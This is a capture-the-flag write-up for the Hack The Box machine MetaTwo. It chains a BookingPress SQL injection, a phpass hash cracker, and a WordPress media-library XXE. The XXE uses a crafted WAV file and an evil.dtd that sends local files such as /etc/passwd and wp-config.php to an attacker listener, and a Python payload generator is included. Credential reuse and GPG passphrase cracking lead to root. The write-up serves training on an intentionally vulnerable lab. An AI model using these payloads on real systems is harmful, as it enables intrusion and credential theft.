MetaTwo - HTB - Key Points
November 18, 2022•2,070 words
Target's IP: 10.10.11.186
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Port 80 redirects to the virtual host metapress.htb, which is not in DNS ("Unknown host"); map it to 10.10.11.186 in /etc/hosts before browsing.
Proudly powered by WordPress. Let's enumerate using wpscan.
[i] Plugin(s) Identified:
[+] bookingpress-appointment-booking
| Location: http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/
| Last Updated: 2022-11-02T08:20:00.000Z
| Readme: http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/readme.txt
| [!] The version is out of date, the latest version is 1.0.46
|
| Found By: Known Locations (Aggressive Detection)
| - http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/, status: 200
|
| [!] 1 vulnerability identified:
|
| [!] Title: BookingPress < 1.0.11 - Unauthenticated SQL Injection
| Fixed in: 1.0.11
| References:
| - https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0739
| - https://plugins.trac.wordpress.org/changeset/2684789
|
| Version: 1.0.10 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/readme.txt
| Confirmed By: Translation File (Aggressive Detection)
| - http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/languages/bookingpress-appointment-booking-en_US.po, Match: 'sion: BookingPress Appointment Booking v1.0.10'
There is a public PoC for this vulnerability (CVE-2022-0739, an unauthenticated SQL injection in the plugin's AJAX endpoint). It needs a valid WordPress nonce, which the page that embeds the booking form exposes in its HTML source; pass it with -n:
python3 booking-press-expl.py -u http://metapress.htb -n a3aa561d42
- BookingPress PoC
-- Got db fingerprint: 10.5.15-MariaDB-0+deb11u1
-- Count of users: 2
|admin|admin@metapress.htb|$P$BG...zk.TV.|
|manager|manager@metapress.htb|$P$B4...6Q70|
The hashes are WordPress phpass hashes (the $P$ prefix; hashcat mode 400, john's phpass format). Cracking them against a wordlist yields manager's password.
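As an added worked example (not part of the original writeup or of the PoC), here is what cracking those $P$ hashes actually computes: a pure-Python implementation of the phpass portable hash and a dictionary attack over it. The sample salt, password and wordlist are constructed here, because the writeup truncates the real hashes; in practice you run hashcat -m 400 or john --format=phpass rather than this.

```python
import hashlib
from typing import Iterable, Optional

# phpass' private alphabet; the position in this string is the 6-bit value.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass' own base64 variant: 6-bit groups taken little-endian from each
    3-byte window, no padding. Not interchangeable with RFC 4648 base64."""
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def phpass_hash(password: str, setting: str) -> str:
    """Portable phpass hash as used by WordPress ($P$) and phpBB3 ($H$).
    Layout: '$P$' + one char encoding log2(iterations) + 8-char salt +
    22 chars of encoded MD5. The salt is hashed with the password once,
    then the digest is re-hashed with the password 2**count_log2 times."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:          # same bounds phpass itself enforces
        raise ValueError("iteration count out of range")
    salt = setting[4:12].encode()
    pw = password.encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def crack_phpass(target: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: salt and cost are read from the target hash itself,
    so every candidate is hashed with the same setting and compared."""
    setting = target[:12]
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if phpass_hash(candidate, setting) == target:
            return candidate
    return None


# Constructed sample (hypothetical salt and password): WordPress's default
# cost is 'B' (2**13 rounds), the same cost the dumped hashes carry.
SAMPLE_SETTING = "$P$BxY7QzL3m"
SAMPLE_HASH = phpass_hash("correcthorse", SAMPLE_SETTING)
SAMPLE_WORDLIST = ["password", "123456", "correcthorse", "letmein"]

if __name__ == "__main__":
    print("sample hash:", SAMPLE_HASH)
    print("cracked:", crack_phpass(SAMPLE_HASH, SAMPLE_WORDLIST))
```

The cost character is why cracking is slow compared with plain MD5: a 'B' hash costs 8193 MD5 calls per candidate, so a wordlist attack is the realistic path, which is exactly why admin's hash can survive while manager's falls.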
Logging in to WordPress as manager gives an account that can upload to the media library, which is all that the second vulnerability needs: an XXE in WordPress' media library (CVE-2021-29447, WordPress 5.6 to 5.7 running on PHP 8), described at https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/. A crafted WAV file whose iXML chunk contains a DOCTYPE makes the server-side metadata parser fetch our DTD and leak local files to our listener (10.10.14.36 below):
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.36/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
Serve the following evil.dtd from 10.10.14.36 (for example with python3 -m http.server 80), then upload payload.wav through Media > Add New. The parser loads evil.dtd, reads the target file through the php://filter wrapper as base64 (so newlines and special characters survive inside a URL), and requests http://10.10.14.36/?p=<base64> from our web server, where the file shows up in the access log:
evil.dtd:
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.36/?p=%file;'>" >
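As an added example (not the writeup's code and not wpsec's PoC), here is the same payload built programmatically with correct RIFF sizes instead of the hard-coded ones, the matching DTD generated from a target path, and a decoder for the callback the listener receives. The listener address 10.10.14.36 is the writeup's; the sample callback request in the test is constructed. The chunk layout mirrors the echo one-liner above.

```python
import base64
import struct
from typing import List, Tuple
from urllib.parse import urlparse

# Assumed listener (hypothetical; the writeup used 10.10.14.36).
ATTACKER = "http://10.10.14.36"


def build_xxe_wav(dtd_url: str) -> bytes:
    """Return a RIFF/WAVE file whose only chunk is 'iXML', carrying a DOCTYPE
    that pulls an external parameter entity from dtd_url. WordPress's media
    library parses iXML metadata as XML via getID3, which is the trigger for
    CVE-2021-29447. Sizes are computed rather than hard-coded."""
    xml = (
        '<?xml version="1.0"?>'
        "<!DOCTYPE ANY["
        f"<!ENTITY % remote SYSTEM '{dtd_url}'>"
        "%remote;%init;%trick;"
        "]>"
    ).encode()
    chunk_data = xml + b"\x00"                        # NUL-terminated like the PoC
    pad = b"\x00" if len(chunk_data) % 2 else b""     # RIFF pads odd-sized chunks
    ixml = b"iXML" + struct.pack("<I", len(chunk_data)) + chunk_data + pad
    body = b"WAVE" + ixml
    return b"RIFF" + struct.pack("<I", len(body)) + body


def build_evil_dtd(target: str, callback: str) -> str:
    """The DTD served at dtd_url. php://filter base64-encodes the target so a
    multi-line file with special characters fits in one URL; the inner entity
    then makes the parser fetch callback/?p=<base64>, leaking the file."""
    return (
        "<!ENTITY % file SYSTEM "
        f'"php://filter/read=convert.base64-encode/resource={target}">\n'
        "<!ENTITY % init \"<!ENTITY % trick SYSTEM "
        f"'{callback}/?p=%file;'>\" >\n"
    )


def parse_riff_chunks(data: bytes) -> List[Tuple[bytes, bytes]]:
    """Walk the chunks after the RIFF/WAVE header, to sanity-check the payload
    before uploading it."""
    if data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    chunks, pos = [], 12
    while pos + 8 <= len(data):
        cid = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        chunks.append((cid, data[pos + 8:pos + 8 + size]))
        pos += 8 + size + (size % 2)                  # skip the pad byte
    return chunks


def decode_exfil(request_line: str) -> bytes:
    """Recover the leaked file from the request line our listener logs, e.g.
    'GET /?p=cm9vdD... HTTP/1.1'. The value is taken raw instead of through
    parse_qs, because '+' in the base64 would otherwise become a space."""
    path = request_line.split(" ")[1]
    for part in urlparse(path).query.split("&"):
        key, _, value = part.partition("=")
        if key == "p":
            return base64.b64decode(value)
    raise ValueError("no p= parameter in request")


if __name__ == "__main__":
    with open("payload.wav", "wb") as f:
        f.write(build_xxe_wav(f"{ATTACKER}/evil.dtd"))
    with open("evil.dtd", "w") as f:
        f.write(build_evil_dtd("/etc/passwd", ATTACKER))
    print("wrote payload.wav and evil.dtd; serve evil.dtd from", ATTACKER)
```

Change the resource in build_evil_dtd to read the next file (the nginx config, then wp-config.php) and re-upload the same WAV; only the DTD on the listener has to change between reads.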
Using the same technique we read the nginx virtual host configuration, /etc/nginx/sites-enabled/default, which shows that the WordPress document root is /var/www/metapress.htb/blog.
Knowing the path, we read /var/www/metapress.htb/blog/wp-config.php for credentials:
/** MySQL database username */
define( 'DB_USER', 'blog' );
/** MySQL database password */
define( 'DB_PASSWORD', '635...FUZ' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NY...vJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );
FS_METHOD set to ftpext means WordPress writes its own updates over FTP with these credentials, so they are valid for the FTP service on port 21. Logging in there, the mailer script sendmail.php contains another set of credentials:
$mail->Host = "mail.metapress.htb";
$mail->SMTPAuth = true;
$mail->Username = "jnelson@metapress.htb";
$mail->Password = "Cb4...@Ys";
$mail->SMTPSecure = "tls";
$mail->Port = 587;
jnelson reuses this SMTP password for SSH, so the credentials give us a shell on the box:
cat user.txt
e64...69
jnelson's home directory holds a passpie database (passpie is a GPG-backed command-line password manager). Its key file contains a private GPG key protected by a weak passphrase: save the key to a file, convert it with gpg2john and crack the passphrase with john the ripper and a wordlist.
The passpie store holds root's SSH password. Import the private key into your own keyring (gpg --import), then decrypt the stored entry with the cracked passphrase (passpie export, or gpg --decrypt on the encrypted entry) to retrieve the password for root access: p7...0x
root@meta2:~# cat root.txt
fcd...6c
Merry hacking ;)